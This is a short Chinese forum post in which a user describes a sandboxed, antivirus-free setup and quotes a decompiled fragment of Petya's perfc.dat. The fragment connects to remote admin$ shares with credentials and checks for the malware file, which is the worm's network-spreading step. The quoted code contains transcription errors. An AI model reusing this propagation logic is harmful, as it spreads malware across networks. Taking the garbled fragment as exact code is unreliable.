本帖最后由 PeepingTom 于 2017-7-12 07:51 编辑
我也是是裸奔虚拟机卡饭VM+沙盘5.18
只不过挡案都在EXT3分区
全靠自制的几个 疫苗 过日子 ... ...最岀名的petya是用病独自己perfc.dat代码写的
- wsprintfW(&Name, L"\\\\%s\\admin[ DISCUZ_CODE_0 ]quot;, a1);
- NetResource.dwScope = 0;
- memset(&NetResource dwType, 0, 0x1Cu);
- NetResource.1pRemoteName = &Name;
- NetResource.dwType = 1;
- get_current_module_name_convert_tows(&v23);
- wsprintfW(&FileName, L"\\\\%ws\\admin$\\%ws", a1, &v23);
- while ( 1 )
- {
- pszPath = 0;
- v11 = v4;
- v18 = WNetAddConnection2W(&NetResource, 1pPassword, 1pUserName, 0);
- wsprintfW(&pszPath, L"\\\\%ws\\admin$\\%ws", a1, &v23);
- v5 = PathFindExtentionW(&pszPath);
- if ( v5 )
- {
- *v5 = 0;
- if ( PathFileExistsW(&pszPath) )
- {
- v13 = 1;
- goto exit;
- }
- dwErrCode = GetLastError();
- }
-
复制代码 |